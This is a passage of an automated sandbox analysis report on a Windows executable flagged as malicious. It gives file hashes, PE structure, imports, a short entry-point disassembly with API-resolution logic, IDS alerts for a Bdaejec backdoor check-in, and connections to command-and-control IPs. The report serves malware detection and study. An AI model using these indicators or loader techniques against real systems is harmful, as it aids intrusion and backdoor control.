                                                  SHA-512:3853B8E03E3971B6F5D750ACDF4E3E828F96E2FE0FC1EA629A7DE1D33F74171D681E096A4789F70B29A5B01437EF1F1293A403B1D7F6DF73E3D6E1E3970BC45D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):0.9863689191924616
                                                  Encrypted:false
                                                  SSDEEP:192:mVLXnQSbLuMkC0Us/yijU/AmzuiFOZ24IO8Qk:qLXn9LuMkJUs/yijIzuiFOY4IO8Qk
                                                  MD5:E148586A64376EAB72056D5A9A31A2D3
                                                  SHA1:9811FC7C396F147E687962367E53B686689DC8C3
                                                  SHA-256:0DF5DCDB41AD27CF438786155F35976C0EA145EB68473FA5ABFBCDA1D5BAB302
                                                  SHA-512:1B598FC196EC754FA8BF4EBDED7BB04BE72FAEFA629116C47FB102E40D774EC6C3F2F33AA6451A5884615BD9DBDAD9165633292623C68DB68F5D90686D3A1070
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.2.2.8.2.9.9.5.3.5.7.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.2.2.8.3.0.4.6.9.2.1.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.d.2.6.a.d.f.-.9.3.4.2.-.4.6.2.f.-.a.7.4.2.-.2.9.1.9.1.c.9.4.5.f.7.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.c.6.4.1.4.0.-.f.2.a.3.-.4.b.3.d.-.8.2.7.f.-.7.1.a.d.7.1.4.7.a.0.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.o.U.N.t.L...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.6.8.-.0.0.0.1.-.0.0.1.4.-.c.0.c.9.-.d.7.4.b.e.8.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.7.2.7.4.f.d.a.9.9.2.c.6.5.5.d.4.6.4.f.5.0.a.6.c.7.e.1.b.0.b.3.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.I.o.U.N.t.L...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Mini DuMP crash report, 14 streams, Thu Jul 25 23:13:50 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):165520
                                                  Entropy (8bit):1.777581079229291
                                                  Encrypted:false
                                                  SSDEEP:384:QqGdGJcG59G76zW43ewMYZOIDFbYFsU/hhNuAWtCGKaid:Qt8j59o6tZfGh2lrqd
                                                  MD5:660A9AB446AB4B86BDC3DCEBA3EDF929
                                                  SHA1:05C404D18CC31A29005733EC1E6BC08EF13A789E
                                                  SHA-256:4DF9F4747EF28B85A19331534645319C2B9E125CAB5B76459F459C6DCC5FE428
                                                  SHA-512:EF5F7078E218AE75EAEA45E09F058C4DC6FE727967B3E0DA0C232F638A4CEB306DEDE4E6BAC0D3115E81FF657B36FD4383300A7DE10F5A19232B9CABC50A3214
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:MDMP..a..... .........f........................................dT..........T.......8...........T...........8<..XJ..........P!..........<#..............................................................................eJ.......#......GenuineIntel............T.......h...(.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8386
                                                  Entropy (8bit):3.699745547059298
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJNW6L6YiR6hYhgmfG51pDy89boEsfc4m:R6lXJM6L6YE6CgmfG5ro3fC
                                                  MD5:2452EF6E7A0776F4414F136F093C7690
                                                  SHA1:FB11A42F98E1DAB5ADED8C419B2AF8EF3B3EC851
                                                  SHA-256:57A632761A78FDA728E6AE8998045E3ABE39BAD66DF2BF7A550C7E84E4D63BBA
                                                  SHA-512:E8196F472E2687EB01F895054DA7960467E9918BC1B9902CDFF333C23FD261F54C6757C257A7A47E4CB488D5A1EC9CD88F2FA1451BCA5CD411F41E7C7C7C3326
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.2.0.<./.P.i.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4551
                                                  Entropy (8bit):4.452966152199874
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zsgJg77aI9rgWpW8VYKZYm8M4JiEyJKFq+q890/s10otgKthdd:uIjfmI7FZ7VwJK2TgQhdd
                                                  MD5:7A1F3E50E1BDDFD2DFDA5456ED068645
                                                  SHA1:D0EAA864DE77DD4E8A19D7E80072FDD4939C0210
                                                  SHA-256:ADBEFF9CC4E987207E71ADF84027EB620E36BEF5990AEDD7D57868A169B56936
                                                  SHA-512:1921D1FCE90E976B804583D1B2EA18ABDA409173FB8005C5A4F0318C05D24532586576EC276D9EFFC84F7AB095D40532571F177BE7DF38DA9761FABD9B5DB8B9
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427096" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                  Process:C:\Users\user\AppData\Local\Temp\IoUNtL.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4
                                                  Entropy (8bit):1.5
                                                  Encrypted:false
                                                  SSDEEP:3:Nv:9
                                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:foo.
                                                  Process:C:\Users\user\AppData\Local\Temp\IoUNtL.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4
                                                  Entropy (8bit):1.5
                                                  Encrypted:false
                                                  SSDEEP:3:Nv:9
                                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                  Malicious:false
                                                  Preview:foo.
                                                  Process:C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):15872
                                                  Entropy (8bit):7.031075575407894
                                                  Encrypted:false
                                                  SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                                                  MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                                                  SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                                                  SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                                                  SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Joe Sandbox View:
                                                  • Filename: fu[1].exe, Detection: malicious, Browse
                                                  • Filename: FEB32B614BC7F38CC0B553B5FEE80B7E68AD8AE78DF1F1CAE4016A5AA1C4677A.exe, Detection: malicious, Browse
                                                  • Filename: FlTXgerTRvw.exe, Detection: malicious, Browse
                                                  • Filename: file_4571518150a8181b403df4ae7ad54ce8b16ded0c.exe, Detection: malicious, Browse
                                                  • Filename: gXS0XyxK6mEQT3EV6q_EMTEM.exe, Detection: malicious, Browse
                                                  • Filename: geolocationlookup.exe, Detection: malicious, Browse
                                                  • Filename: InstallBC201401.exe, Detection: malicious, Browse
                                                  • Filename: InstallBC201401.exe, Detection: malicious, Browse
                                                  • Filename: invoice_2318362983713_823931342io.pdf.exe, Detection: malicious, Browse
                                                  • Filename: LisectAVT_2403002A_55.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\IoUNtL.exe
                                                  File Type:MS Windows registry file, NT/2000 or above
                                                  Category:dropped
                                                  Size (bytes):1835008
                                                  Entropy (8bit):4.422072229110272
                                                  Encrypted:false
                                                  SSDEEP:6144:vSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNz0uhiTw:6vloTMW+EZMM6DFyV03w
                                                  MD5:58CBEE58A92BF01CA51CD32B4CC423D2
                                                  SHA1:6085F8888FDCEEA346DFD9B3911BC01AC31168EC
                                                  SHA-256:AA45DA028EA0A6556241CBB951E391D47CE63018B5015B9C02B764D63081C75D
                                                  SHA-512:CD6AE1F11A7139E75CD02E979CFDBD8E38D46D4B836867A0EEC1A38974F20AC5CD5BEBD729027BBD98B69CD349E5DBEF73040443771B775E5F207C932C77E682
                                                  Malicious:false
                                                  Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmF[sL.................................................................................................................................................................................................................................................................................................................................................Oex........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.267751062750196
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.42%
                                                  • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                  • Windows Screen Saver (13104/52) 0.13%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  File name:FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
                                                  File size:382'464 bytes
                                                  MD5:c2bbbc6bb9408f1811a956ae26572f62
                                                  SHA1:aba71a8c8738a382b3acc454a8ae70a794d760b7
                                                  SHA256:9bc2f72646fcc040a0c11d469f353931f3d6eb606f8fa60bdcbd0fa091e59968
                                                  SHA512:911611ca9e77c8ed99823c5d35d85d9bc664c2bd64dbd2cc036cae41b9d9745a82536e120d4a24b963f5cd3b1948ad01304c01228d39497230f53c9d40072f04
                                                  SSDEEP:6144:/O6Vlr33sH4azVqKRh+z9GGqX0MY3NguxZdnH/MJcRW5LOYom:/hlr33sH4elT1XU9gunREoR
                                                  TLSH:B884D010BB90D034E4BB12F5487A9368B53E79A05B2055CB73E85BEF1635AE4EC3235B
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........=.g.n.g.n.g.n.5Kn.g.n.5]n.g.n...n.g.n.g.nBg.n.5Zn.g.n.5Jn.g.n.5On.g.nRich.g.n................PE..L......`...................
                                                  Icon Hash:317a8c6f0fce7969
                                                  Entrypoint:0x485000
                                                  Entrypoint Section:u
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x60B1E213 [Sat May 29 06:41:23 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:0
                                                  File Version Major:5
                                                  File Version Minor:0
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:0
                                                  Import Hash:e22fde80595c4bea0880fd6845018d6a
                                                  Instruction
                                                  push ebp
                                                  mov ebp, esp
                                                  sub esp, 0000016Ch
                                                  xor eax, eax
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  mov dword ptr [ebp-24h], eax
                                                  mov dword ptr [ebp-10h], eax
                                                  mov dword ptr [ebp-14h], eax
                                                  mov dword ptr [ebp-08h], eax
                                                  mov dword ptr [ebp-0Ch], eax
                                                  mov dword ptr [ebp-20h], eax
                                                  mov dword ptr [ebp-18h], eax
                                                  mov dword ptr [ebp-48h], 4E556F49h
                                                  mov dword ptr [ebp-44h], 652E4C74h
                                                  mov dword ptr [ebp-40h], 00006578h
                                                  mov dword ptr [ebp-3Ch], 00000000h
                                                  call 00007F885460CBD5h
                                                  pop eax
                                                  add eax, 00000225h
                                                  mov dword ptr [ebp-04h], eax
                                                  mov eax, dword ptr fs:[00000030h]
                                                  mov dword ptr [ebp-28h], eax
                                                  mov eax, dword ptr [ebp-04h]
                                                  mov dword ptr [eax], E904C483h
                                                  mov eax, dword ptr [ebp-04h]
                                                  mov dword ptr [eax+04h], FFF856AFh
                                                  mov eax, dword ptr [ebp-28h]
                                                  mov eax, dword ptr [eax+0Ch]
                                                  mov eax, dword ptr [eax+1Ch]
                                                  mov eax, dword ptr [eax]
                                                  mov eax, dword ptr [eax+08h]
                                                  mov ecx, dword ptr [eax+3Ch]
                                                  mov ecx, dword ptr [ecx+eax+78h]
                                                  add ecx, eax
                                                  mov edi, dword ptr [ecx+1Ch]
                                                  mov ebx, dword ptr [ecx+20h]
                                                  mov esi, dword ptr [ecx+24h]
                                                  mov ecx, dword ptr [ecx+18h]
                                                  add esi, eax
                                                  add edi, eax
                                                  add ebx, eax
                                                  xor edx, edx
                                                  mov dword ptr [ebp-30h], esi
                                                  mov dword ptr [ebp-1Ch], edx
                                                  mov dword ptr [ebp-34h], ecx
                                                  cmp edx, dword ptr [ebp-34h]
                                                  jnc 00007F885460CD1Eh
                                                  movzx ecx, word ptr [esi+edx*2]
                                                  mov edx, dword ptr [ebx+edx*4]
                                                  mov esi, dword ptr [edi+ecx*4]
                                                  add edx, eax
                                                  mov ecx, dword ptr [edx]
                                                  add esi, eax
                                                  cmp ecx, 4D746547h
                                                  jne 00007F885460CC24h
                                                  cmp dword ptr [edx+04h], 6C75646Fh
                                                  jne 00007F885460CC1Bh
                                                  Programming Language:
                                                  • [ASM] VS2008 build 21022
                                                  • [ C ] VS2008 build 21022
                                                  • [IMP] VS2005 build 50727
                                                  • [C++] VS2008 build 21022
                                                  • [RES] VS2008 build 21022
                                                  • [LNK] VS2008 build 21022
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x250340x3c.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x7c0000x8918.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x13000x1c.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x7e300x40.text
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x2b8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x250880x252000b5a2049c7b86174b40cc50d90d533bcFalse0.4162589436026936zlib compressed data6.1441946593477565IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .data0x270000x543a00x2b40031305864ba64772c0670cc58b9befed0False0.9579457189306358data7.896116091147135IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x7c0000x89180x8a00c192b08622772bdde7445a8f5dbae6f0False0.6306329257246377data6.303031245216908IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  u0x850000x50000x4200567828822f8cf31b3333ff5f35cb9b71False0.7774621212121212data6.934487792037011IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  HEPIYIWENIMOMACAMAKA0x82ec80xee8ASCII text, with very long lines (3816), with no line terminatorsUzbekItaly0.59958071278826
                                                  MIMELA0x83db00x2faASCII text, with very long lines (762), with no line terminatorsUzbekItaly0.6456692913385826
                                                  RT_ICON0x7c4800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0UzbekItaly0.5166967509025271
                                                  RT_ICON0x7cd280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0UzbekItaly0.5887096774193549
                                                  RT_ICON0x7d3f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0UzbekItaly0.5765895953757225
                                                  RT_ICON0x7d9580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0UzbekItaly0.6106941838649156
                                                  RT_ICON0x7ea000x988Device independent bitmap graphic, 24 x 48 x 32, image size 0UzbekItaly0.5868852459016394
                                                  RT_ICON0x7f3880x468Device independent bitmap graphic, 16 x 32 x 32, image size 0UzbekItaly0.6320921985815603
                                                  RT_ICON0x7f8500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216UzbekItaly0.7368257261410789
                                                  RT_ICON0x81df80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096UzbekItaly0.8187148217636022
                                                  RT_STRING0x842400xa8dataUzbekItaly0.6666666666666666
                                                  RT_STRING0x842e80x2f6dataUzbekItaly0.46437994722955145
                                                  RT_STRING0x845e00x15edataUzbekItaly0.5457142857142857
                                                  RT_STRING0x847400x1d6dataUzbekItaly0.5127659574468085
                                                  RT_ACCELERATOR0x840d00x30dataUzbekItaly0.9791666666666666
                                                  RT_ACCELERATOR0x840b00x20dataUzbekItaly1.09375
                                                  RT_GROUP_ICON0x82ea00x22dataUzbekItaly1.0294117647058822
                                                  RT_GROUP_ICON0x7f7f00x5adataUzbekItaly0.7222222222222222
                                                  RT_VERSION0x841000x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79UzbekItaly0.603125
                                                  DLLImport
                                                  KERNEL32.dllLoadLibraryA, CreateMutexW, SetLocaleInfoW, FindNextVolumeW, GetNamedPipeHandleStateA, LocalFileTimeToFileTime, EnumResourceTypesW, EnumResourceNamesW, FillConsoleOutputCharacterA, CreateTimerQueueTimer, TerminateProcess, SetEvent, FindNextFileW, GetCompressedFileSizeA, CopyFileExW, BuildCommDCBW, VerifyVersionInfoA, FreeResource, SetLastError, GetVersionExA, ReadConsoleOutputCharacterA, SetDefaultCommConfigW, VerLanguageNameW, GetCommConfig, WritePrivateProfileStructW, LocalFree, CreateTimerQueue, FindNextVolumeMountPointA, ResetWriteWatch, WriteConsoleInputA, LoadResource, AddAtomW, InitAtomTable, GetThreadPriority, CallNamedPipeW, GetDriveTypeW, BuildCommDCBAndTimeoutsA, VirtualProtect, GlobalAlloc, VerifyVersionInfoW, InterlockedExchange, FindFirstChangeNotificationW, SearchPathW, FormatMessageW, SetDllDirectoryW, GetModuleHandleA, WritePrivateProfileStringA, GetUserDefaultLCID, TerminateThread, GlobalUnfix, SetConsoleWindowInfo, InterlockedDecrement, GetStartupInfoA, GetSystemWow64DirectoryW, CopyFileA, GetPrivateProfileIntA, SetCalendarInfoW, DebugBreak, SetConsoleCursorInfo, FreeLibraryAndExitThread, GetModuleFileNameA, SetConsoleScreenBufferSize, WaitForDebugEvent, InterlockedExchangeAdd, GetOEMCP, GetPrivateProfileStringW, CreateActCtxA, GetPrivateProfileIntW, ReadConsoleInputW, OutputDebugStringW, SetThreadAffinityMask, FlushConsoleInputBuffer, lstrlenA, WriteConsoleW, OpenMutexW, GetThreadContext, DeleteCriticalSection, QueryDepthSList, ConvertFiberToThread, SetProcessPriorityBoost, LockFile, FreeEnvironmentStringsA, GetConsoleCP, CreateIoCompletionPort, AllocConsole, GlobalGetAtomNameW, SetComputerNameA, GetConsoleAliasExesLengthA, CreateMailslotW, GetCommState, MoveFileWithProgressW, GetSystemTimeAdjustment, EnumSystemLocalesA, GetLastError, WriteProfileStringA, OpenMutexA, OpenWaitableTimerW, OpenFileMappingW, GetFileSizeEx, GetConsoleAliasesLengthW, SetProcessShutdownParameters, FillConsoleOutputCharacterW, WriteConsoleOutputCharacterA, GetNumberFormatA, BuildCommDCBAndTimeoutsW, GetConsoleAliasExesA, GetBinaryTypeW, GetModuleHandleW, Sleep, InterlockedIncrement, GetProcAddress, ExitProcess, MoveFileA, DeleteFileA, RaiseException, GetStartupInfoW, HeapValidate, IsBadReadPtr, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, TlsGetValue, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, WriteFile, GetStdHandle, GetACP, GetCPInfo, IsValidCodePage, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InitializeCriticalSectionAndSpinCount, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapDestroy, HeapCreate, HeapFree, VirtualFree, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, OutputDebugStringA, LoadLibraryW, WideCharToMultiByte, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CloseHandle, CreateFileA
                                                  USER32.dllCharUpperW
                                                  Language of compilation systemCountry where language is spokenMap
                                                  UzbekItaly
                                                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                  2024-07-26T01:14:04.446908+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971520.12.23.50192.168.2.5
                                                  2024-07-26T01:14:41.731017+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972320.12.23.50192.168.2.5
                                                  2024-07-26T01:13:46.764340+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49704799192.168.2.544.221.84.105
                                                  2024-07-26T01:13:46.099545+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6468553192.168.2.51.1.1.1
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 26, 2024 01:13:46.352693081 CEST49704799192.168.2.544.221.84.105
                                                  Jul 26, 2024 01:13:46.360260963 CEST7994970444.221.84.105192.168.2.5
                                                  Jul 26, 2024 01:13:46.360356092 CEST49704799192.168.2.544.221.84.105
                                                  Jul 26, 2024 01:13:46.360872030 CEST49704799192.168.2.544.221.84.105
                                                  Jul 26, 2024 01:13:46.368150949 CEST7994970444.221.84.105192.168.2.5
                                                  Jul 26, 2024 01:13:46.764174938 CEST7994970444.221.84.105192.168.2.5
                                                  Jul 26, 2024 01:13:46.764281034 CEST7994970444.221.84.105192.168.2.5
                                                  Jul 26, 2024 01:13:46.764339924 CEST49704799192.168.2.544.221.84.105
                                                  Jul 26, 2024 01:13:46.765290022 CEST49704799192.168.2.544.221.84.105
                                                  Jul 26, 2024 01:13:46.777626038 CEST49704799192.168.2.544.221.84.105
                                                  Jul 26, 2024 01:13:46.784889936 CEST7994970444.221.84.105192.168.2.5
                                                  Jul 26, 2024 01:13:55.073402882 CEST4970934450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:13:55.080214024 CEST3445049709193.106.191.123192.168.2.5
                                                  Jul 26, 2024 01:13:55.080291033 CEST4970934450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:13:55.204770088 CEST4970934450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:13:55.211565018 CEST3445049709193.106.191.123192.168.2.5
                                                  Jul 26, 2024 01:14:16.475133896 CEST3445049709193.106.191.123192.168.2.5
                                                  Jul 26, 2024 01:14:16.475220919 CEST4970934450192.168.2.5193.106.191.123
